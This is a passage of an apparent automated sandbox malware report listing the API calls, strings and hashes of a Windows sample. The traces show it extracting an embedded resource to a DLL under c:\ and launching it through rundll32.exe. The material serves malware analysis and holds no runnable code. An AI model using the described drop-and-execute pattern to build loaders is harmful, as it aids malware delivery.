                                                        • String ID: %2.2X $%6.6X$D`@
                                                        • API String ID: 3308870338-4221501666

                                                        Control-flow Graph

                                                        APIs
                                                        • FindResourceA.KERNEL32(00000000,00000084,IMAGE), ref: 00401A46
                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401A54
                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401A69
                                                        • LockResource.KERNEL32(00000000,00000000), ref: 00401A74
                                                        • memcpy.MSVCRT(00000000,00000000), ref: 00401A7C
                                                        • wsprintfA.USER32 ref: 00401B2B
                                                        • CreateDirectoryA.KERNEL32(?,00000000), ref: 00401B38
                                                        • Sleep.KERNEL32(00000064), ref: 00401B40
                                                        • memset.MSVCRT ref: 00401B4D
                                                        • wsprintfA.USER32 ref: 00401B74
                                                        • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00401B90
                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00401BA2
                                                        • CloseHandle.KERNEL32(00000000), ref: 00401BA9
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00401BFA
                                                        • wsprintfA.USER32 ref: 00401C21
                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00401C5C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: Resource$CreateFilewsprintf$CloseDirectoryFindHandleLoadLockModuleNameProcessSizeofSleepWritememcpymemset
                                                        • String ID: %s "%s",QueryPluginInterface %s$%s\%s.dll$D$IMAGE$c:\%s$c:\windows\system32\rundll32.exe
                                                        • API String ID: 729933531-2732814730

                                                        Control-flow Graph

                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 00401F1E
                                                        • #4710.MFC42 ref: 00401F2B
                                                        • GetSystemMenu.USER32(?,00000000), ref: 00401F36
                                                        • #2863.MFC42(00000000), ref: 00401F3D
                                                        • #540.MFC42(00000000), ref: 00401F4C
                                                        • #4160.MFC42(00000065,00000000), ref: 00401F5B
                                                        • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00401F79
                                                        • AppendMenuA.USER32(?,00000000,00000010,?), ref: 00401F85
                                                        • #800.MFC42(00000065,00000000), ref: 00401F90
                                                        • SendMessageA.USER32(?,00000080,00000001,?), ref: 00401FB1
                                                        • SendMessageA.USER32(?,00000080,00000000,?), ref: 00401FBF
                                                        • #823.MFC42(00000128), ref: 00401FC6
                                                        • #2086.MFC42(00000082), ref: 00401FFE
                                                        • #6215.MFC42(00000005,00000082), ref: 0040200F
                                                        • SendMessageA.USER32(?,00001037,00000000,00000000), ref: 00402021
                                                        • SendMessageA.USER32(?,00001036,00000000,00000000), ref: 00402033
                                                        • SendMessageA.USER32(?,00001037,00000000,00000000), ref: 00402042
                                                        • SendMessageA.USER32(?,00001036,00000000,00000000), ref: 00402050
                                                        • #3996.MFC42(00000000,00406328,00000000,00000028,000000FF), ref: 00402065
                                                        • #3996.MFC42(00000001,00406320,00000000,0000008C,000000FF,00000000,00406328,00000000,00000028,000000FF), ref: 0040207C
                                                        • #3996.MFC42(00000002,00406318,00000000,0000008C,000000FF,00000001,00406320,00000000,0000008C,000000FF,00000000,00406328,00000000,00000028,000000FF), ref: 0040208E
                                                        • #3996.MFC42(00000003,00406310,00000000,00000037,000000FF,00000002,00406318,00000000,0000008C,000000FF,00000001,00406320,00000000,0000008C,000000FF,00000000), ref: 004020A1
                                                        • #3996.MFC42(00000004,00406308,00000000,00000064,000000FF,00000003,00406310,00000000,00000037,000000FF,00000002,00406318,00000000,0000008C,000000FF,00000001), ref: 004020B4
                                                        • InitializeCriticalSection.KERNEL32(?,00000004,00406308,00000000,00000064,000000FF,00000003,00406310,00000000,00000037,000000FF,00000002,00406318,00000000,0000008C,000000FF), ref: 004020C0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$#3996$Menu$Append$#2086#2863#4160#4710#540#6215#800#823CriticalH_prologInitializeSectionSystem
                                                        • String ID:
                                                        • API String ID: 2371848494-0

                                                        Control-flow Graph

                                                        control_flow_graph 167 40141d-40142c 168 401432-40147b SendMessageA * 3 167->168 169 4014ef-4014f4 167->169 170 4014ad-4014b5 168->170 171 40147d-4014ab SendMessageA * 3 168->171 172 4014e7-4014ee 170->172 173 4014b7-4014e5 SendMessageA * 3 170->173 171->170 172->169 173->172
                                                        APIs
                                                        • SendMessageA.USER32(?), ref: 0040144F
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 0040145E
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 0040146D
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040148D
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00401499
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 004014AB
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 004014C7
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 004014D3
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 004014E5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        APIs
                                                        • SendMessageA.USER32(?), ref: 00401527
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 00401536
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 00401545
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 00401565
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00401571
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 00401583
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040159F
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 004015AB
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 004015BD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        APIs
                                                        • SendMessageA.USER32(?), ref: 0040137B
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 0040138A
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 00401399
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 004013B5
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 004013C1
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 004013D3
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 004013EF
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 004013FB
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 0040140D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: #567$#324BrushCreateH_prologSolid
                                                        • String ID: D@
                                                        • API String ID: 1271399592-116940557
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,00402216), ref: 00402237
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00402252
                                                        • #3286.MFC42(-00000001,?,?,?,?,?,00402216), ref: 00402261
                                                        • #825.MFC42(?,-00000001,?,?,?,?,?,00402216), ref: 0040226F
                                                        • #825.MFC42(00000000,?,-00000001,?,?,?,?,?,00402216), ref: 00402275
                                                        • SendMessageA.USER32(?,00001008,-00000001,00000000), ref: 0040228A
                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,00402216), ref: 00402294
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: #825CriticalMessageSectionSend$#3286EnterLeave
                                                        • String ID:
                                                        • API String ID: 2141797828-0
                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 00401E2F
                                                        • #324.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E41
                                                        • #567.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E4F
                                                        • #567.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E66
                                                        • #1168.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E91
                                                        • #1146.MFC42(00000080,0000000E,00000080,00000066,?,?,?,?,00401C92,00000000), ref: 00401E9F
                                                        • LoadIconA.USER32(00000000,00000080), ref: 00401EA5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: #567$#1146#1168#324H_prologIconLoad
                                                        • String ID:
                                                        • API String ID: 2995884226-0
                                                        APIs
                                                        Strings
                                                        • ekimhuqcroanflvzgdjtxypswb, xrefs: 0040175B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: rand$CountTicksrand
                                                        • String ID: ekimhuqcroanflvzgdjtxypswb
                                                        • API String ID: 3923125369-3762667353
                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 00401D74
                                                        • #324.MFC42(00000064,00000000), ref: 00401D85
                                                        • #540.MFC42(00000064,00000000), ref: 00401D93
                                                        • #860.MFC42(RedTom21@HotMail.com,00000064,00000000), ref: 00401DA9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: #324#540#860H_prolog
                                                        • String ID: RedTom21@HotMail.com
                                                        • API String ID: 1715175771-4020391281
                                                        APIs
                                                        • GetClientRect.USER32(?,?), ref: 004024F1
                                                        • _ftol.MSVCRT ref: 00402517
                                                        • _ftol.MSVCRT ref: 00402525
                                                        • #4299.MFC42(0000000F,00000041,?,?,00000001), ref: 00402549
                                                        • #4299.MFC42(0000000F,?,?,000000F1,00000001), ref: 0040256B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: #4299_ftol$ClientRect
                                                        • String ID:
                                                        • API String ID: 3171108694-0
                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 004020DF
                                                        • #2379.MFC42 ref: 00402125
                                                          • Part of subcall function 00401D6F: _EH_prolog.MSVCRT ref: 00401D74
                                                          • Part of subcall function 00401D6F: #324.MFC42(00000064,00000000), ref: 00401D85
                                                          • Part of subcall function 00401D6F: #540.MFC42(00000064,00000000), ref: 00401D93
                                                          • Part of subcall function 00401D6F: #860.MFC42(RedTom21@HotMail.com,00000064,00000000), ref: 00401DA9
                                                        • #2514.MFC42 ref: 00402103
                                                        • #800.MFC42 ref: 00402112
                                                        • #641.MFC42 ref: 0040211E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: H_prolog$#2379#2514#324#540#641#800#860
                                                        • String ID:
                                                        • API String ID: 1337987987-0
                                                        • Opcode ID: a4f86554920c1d60b447a310fd9ec504fb6ed513b6fab3962996ee4d40a29264
                                                        • Instruction ID: 0c37060d93abf7ffef3ab529cf96d0046ab1b8bea522c7ef1cdfd7726eb284c9
                                                        • Opcode Fuzzy Hash: a4f86554920c1d60b447a310fd9ec504fb6ed513b6fab3962996ee4d40a29264
                                                        • Instruction Fuzzy Hash: 09F0FE71810518DADB25EFA5C65A7ACB730BF20314F60417FA412761D2DBBC5A09CA59
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: #656$#641H_prolog
                                                        • String ID:
                                                        • API String ID: 2321568657-0
                                                        • Opcode ID: 2301cf39d9f84a458cdb1385a3b7908f8fb3180347b8e91d03edffd7431175f3
                                                        • Instruction ID: e680012da702e7b92035de08c4d7561f67a84a50463a6348afc1be6ddfe969e7
                                                        • Opcode Fuzzy Hash: 2301cf39d9f84a458cdb1385a3b7908f8fb3180347b8e91d03edffd7431175f3
                                                        • Instruction Fuzzy Hash: 5DF03071915654DADB2CEBA5CA197DDBBA4BF04318F00456FE066732C2CBF81B08C755
                                                        APIs
                                                        • #2379.MFC42 ref: 004015D2
                                                        • #4299.MFC42(00000000,00000000,00000028,?,00000001), ref: 00401602
                                                        • #4299.MFC42(00000032,00000000,0000012C,?,00000001), ref: 00401624
                                                        • #4299.MFC42(00000168,00000000,00000000,?,00000001), ref: 00401645
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: #4299$#2379
                                                        • String ID:
                                                        • API String ID: 453929936-0
                                                        • Opcode ID: dc378f647d04030cb087140241a589892729b93da9fee3e182db44f2421a5fcb
                                                        • Instruction ID: 396461380f4f282afe083d313e8dd4ae14482c7760a999395c5db5fab6d4a27c
                                                        • Opcode Fuzzy Hash: dc378f647d04030cb087140241a589892729b93da9fee3e182db44f2421a5fcb
                                                        • Instruction Fuzzy Hash: AF01B131240700ABD5318A59CC81FABB3AAAFC4B05F280E2FF183391D1D7BB8841C619
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1349018329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1349004609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349053835.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349132324.0000000000406000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349152316.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1349170685.0000000000414000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_XgijTrY6No.jbxd
                                                        Similarity
                                                        • API ID: #609#641#693H_prolog
                                                        • String ID:
                                                        • API String ID: 432028610-0
                                                        • Opcode ID: 8fceb26bd7cd2eda50943f19653515a01d97790802a6fa3cf18d9ab7d8ca528c
                                                        • Instruction ID: c1b141184ca5cae31352d23a373f4eac66a41ce64f7327093406d0e5d71bec99
                                                        • Opcode Fuzzy Hash: 8fceb26bd7cd2eda50943f19653515a01d97790802a6fa3cf18d9ab7d8ca528c
                                                        • Instruction Fuzzy Hash: F3F0A070920664DACB18FBA4C6193DDBBB8AF14308F00466FA062732C2CBF81B04C795

                                                        Execution Graph

                                                        Execution Coverage:12%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:1.5%
                                                        Total number of Nodes:275
                                                        Total number of Limit Nodes:5

                                                        Control-flow Graph

                                                        APIs
                                                        • FindResourceA.KERNEL32(00000000,00000084,IMAGE), ref: 00401A46
                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401A54
                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401A69
                                                        • LockResource.KERNEL32(00000000,00000000), ref: 00401A74
                                                        • memcpy.MSVCRT(00000000,00000000), ref: 00401A7C
                                                        • wsprintfA.USER32 ref: 00401B2B
                                                        • CreateDirectoryA.KERNELBASE(?,00000000), ref: 00401B38
                                                        • Sleep.KERNELBASE(00000064), ref: 00401B40
                                                        • memset.MSVCRT ref: 00401B4D
                                                        • wsprintfA.USER32 ref: 00401B74
                                                        • CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00401B90
                                                        • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 00401BA2
                                                        • CloseHandle.KERNEL32(00000000), ref: 00401BA9
                                                        • GetModuleFileNameA.KERNELBASE(00000000,?,00000104), ref: 00401BFA
                                                        • wsprintfA.USER32 ref: 00401C21
                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00401C5C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: Resource$CreateFilewsprintf$CloseDirectoryFindHandleLoadLockModuleNameProcessSizeofSleepWritememcpymemset
                                                        • String ID: %s "%s",QueryPluginInterface %s$%s\%s.dll$D$IMAGE$c:\%s$c:\windows\system32\rundll32.exe
                                                        • API String ID: 729933531-2732814730
                                                        • Opcode ID: f367ddab212173f478f0c3d6209973ce2cd3006af243161d02f2b13398c8c083
                                                        • Instruction ID: 922f0755652aa06ef568071101b0f14043c98d7905c641deb23ee6d51d764bee
                                                        • Opcode Fuzzy Hash: f367ddab212173f478f0c3d6209973ce2cd3006af243161d02f2b13398c8c083
                                                        • Instruction Fuzzy Hash: F86193B2A00248BEDB119BF4CD45FDFBBBCAB89304F1044BAF345B6181DA749A458F65

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                        • String ID: `@
                                                        • API String ID: 801014965-3559765445
                                                        • Opcode ID: 554b2b36ebdbdca76e7e5890daf673f7ab6b653fcba5f1f76f6d923fca04a6ed
                                                        • Instruction ID: fd41096d9372b4dda24e723cd552983fee23a0ad75fa497c59ca918bbf17219f
                                                        • Opcode Fuzzy Hash: 554b2b36ebdbdca76e7e5890daf673f7ab6b653fcba5f1f76f6d923fca04a6ed
                                                        • Instruction Fuzzy Hash: 26418BB0941208AFDB209FA4D945AAA7BBCEB49711B20053FF942B72E5D67949408B28

                                                        Control-flow Graph

                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 00401C6F
                                                        • #1134.MFC42(00000000), ref: 00401C7F
                                                          • Part of subcall function 00401E2A: _EH_prolog.MSVCRT ref: 00401E2F
                                                          • Part of subcall function 00401E2A: #324.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E41
                                                          • Part of subcall function 00401E2A: #567.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E4F
                                                          • Part of subcall function 00401E2A: #567.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E66
                                                          • Part of subcall function 00401E2A: #1168.MFC42(00000066,?,?,?,?,00401C92,00000000), ref: 00401E91
                                                          • Part of subcall function 00401E2A: #1146.MFC42(00000080,0000000E,00000080,00000066,?,?,?,?,00401C92,00000000), ref: 00401E9F
